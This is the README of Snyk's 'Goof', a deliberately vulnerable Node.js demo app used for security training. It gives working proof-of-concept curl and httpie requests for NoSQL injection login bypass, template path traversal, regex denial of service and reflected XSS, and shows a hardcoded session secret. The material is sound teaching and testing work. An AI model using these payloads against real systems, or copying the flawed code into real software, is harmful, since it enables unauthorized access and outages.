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Goof - Snyk's vulnerable demo app

Known Vulnerabilities

A vulnerable Node.js demo application, based on the Dreamers Lab tutorial.

Features

This vulnerable app includes the following capabilities to experiment with:

You can run the MongoDB server individually via Docker, such as:

docker run --rm -p 27017:27017 mongo:3

Running with docker-compose

docker-compose up --build
docker-compose down

Exploiting the vulnerabilities

This app uses npm dependencies holding known vulnerabilities, as well as insecure code that introduces code-level vulnerabilities.

The exploits/ directory includes a series of steps to demonstrate each one.

Vulnerabilities in open source dependencies

Here are the exploitable vulnerable packages:

Vulnerabilities in code

  • Open Redirect
  • NoSQL Injection
  • Code Injection
  • Command execution
  • Cross-site Scripting (XSS)
  • Information exposure via Hardcoded values in code
  • Security misconfiguration exposes server information
  • Insecure protocol (HTTP) communication

Code injection

The page at /account_details is rendered as an Handlebars view.

The same view is used for both the GET request which shows the account details, as well as the form itself for a POST request which updates the account details. A so-called Server-side Rendering.

The form is completely functional. The way it works is, it receives the profile information from the req.body and passes it, as-is to the template. This however means, that the attacker is able to control a variable that flows directly from the request into the view template library.

You'd think that what's the worst that can happen because we use a validation to confirm the expected input, however the validation doesn't take into account a new field that can be added to the object, such as layout, which when passed to a template language, could lead to Local File Inclusion (Path Traversal) vulnerabilities. Here is a proof-of-concept showing it:

curl -X 'POST' --cookie c.txt --cookie-jar c.txt -H 'Content-Type: application/json' --data-binary '{"username": "[email protected]", "password": "SuperSecretPassword"}' 'http://localhost:3001/login'
curl -X 'POST' --cookie c.txt --cookie-jar c.txt -H 'Content-Type: application/json' --data-binary '{"email": "[email protected]", "firstname": "admin", "lastname": "admin", "country": "IL", "phone": "+972551234123",  "layout": "./../package.json"}' 'http://localhost:3001/account_details'

Actually, there's even another vulnerability in this code. The validator library that we use has several known regular expression denial of service vulnerabilities. One of them, is associated with the email regex, which if validated with the {allow_display_name: true} option then we can trigger a denial of service for this route:

curl -X 'POST' -H 'Content-Type: application/json' --data-binary "{\"email\": \"`seq -s "" -f "<" 100000`\"}" 'http://localhost:3001/account_details'

The validator.rtrim() sanitizer is also vulnerable, and we can use this to create a similar denial of service attack:

curl -X 'POST' -H 'Content-Type: application/json' --data-binary "{\"email\": \"[email protected]\", \"country\": \"nop\", \"phone\": \"0501234123\", \"lastname\": \"nop\", \"firstname\": \"`node -e 'console.log(" ".repeat(100000) + "!")'`\"}" 'http://localhost:3001/account_details'

NoSQL injection

A POST request to /login will allow for authentication and signing-in to the system as an administrator user. It works by exposing loginHandler as a controller in routes/index.js and uses a MongoDB database and the User.find() query to look up the user's details (email as a username and password). One issue is that it indeed stores passwords in plaintext and not hashing them. However, there are other issues in play here.

We can send a request with an incorrect password to see that we get a failed attempt

echo '{"username":"[email protected]", "password":"WrongPassword"}' | http --json $GOOF_HOST/login -v

And another request, as denoted with the following JSON request to sign-in as the admin user works as expected:

echo '{"username":"[email protected]", "password":"SuperSecretPassword"}' | http --json $GOOF_HOST/login -v

However, what if the password wasn't a string? what if it was an object? Why would an object be harmful or even considered an issue? Consider the following request:

echo '{"username": "[email protected]", "password": {"$gt": ""}}' | http --json $GOOF_HOST/login -v

We know the username, and we pass on what seems to be an object of some sort. That object structure is passed as-is to the password property and has a specific meaning to MongoDB - it uses the $gt operation which stands for greater than. So, we in essence tell MongoDB to match that username with any record that has a password that is greater than empty string which is bound to hit a record. This introduces the NoSQL Injection vector.

Open redirect

The /admin view introduces a redirectPage query path, as follows in the admin view:

<input type="hidden" name="redirectPage" value="<%- redirectPage %>" />

One fault here is that the redirectPage is rendered as raw HTML and not properly escaped, because it uses <%- > instead of <%= >. That itself, introduces a Cross-site Scripting (XSS) vulnerability via:

http://localhost:3001/login?redirectPage="><script>alert(1)</script>

To exploit the open redirect, simply provide a URL such as redirectPage=https://google.com which exploits the fact that the code doesn't enforce local URLs in index.js:72.

Hardcoded values - session information

The application initializes a cookie-based session on app.js:40 as follows:

app.use(session({
  secret: 'keyboard cat',
  name: 'connect.sid',
  cookie: { secure: true }
}))

As you can see, the session secret used to sign the session is a hardcoded sensitive information inside the code.

First attempt to fix it, can be to move it out to a config file such as:

module.exports = {
    cookieSecret: `keyboard cat`
}

And then require the configuration file and use it to initialize the session. However, that still maintains the secret information inside another file, and Snyk Code will warn you about it.

Another case we can discuss here in session management, is that the cookie setting is initialized with secure: true which means it will only be transmitted over HTTPS connections. However, there's no httpOnly flag set to true, which means that the default false value of it makes the cookie accessible via JavaScript. Snyk Code highlights this potential security misconfiguration so we can fix it. We can note that Snyk Code shows this as a quality information, and not as a security error.

Snyk Code will also find hardcoded secrets in source code that isn't part of the application logic, such as tests/ or examples/ folders. We have a case of that in this application with the tests/authentication.component.spec.js file. In the finding, Snyk Code will tag it as InTest, Tests, or Mock, which help us easily triage it and indeed ignore this finding as it isn't actually a case of information exposure.

Docker Image Scanning

The Dockerfile makes use of a base image (node:6-stretch) that is known to have system libraries with vulnerabilities.

To scan the image for vulnerabilities, run:

snyk test --docker node:6-stretch --file=Dockerfile

To monitor this image and receive alerts with Snyk:

snyk monitor --docker node:6-stretch

Runtime Alerts

Snyk provides the ability to monitor application runtime behavior and detect an invocation of a function is known to be vulnerable and used within open source dependencies that the application makes use of.

The agent is installed and initialized in app.js.

For the agent to report back to your snyk account on the vulnerabilities it detected it needs to know which project on Snyk to associate with the monitoring. Due to that, we need to provide it with the project id through an environment variable SNYK_PROJECT_ID

To run the Node.js app with runtime monitoring:

SNYK_PROJECT_ID=<PROJECT_ID> npm start

** The app will continue to work normally even if it's not provided a project id

Fixing the issues

To find these flaws in this application (and in your own apps), run:

npm install -g snyk
snyk wizard

In this application, the default snyk wizard answers will fix all the issues. When the wizard is done, restart the application and run the exploits again to confirm they are fixed.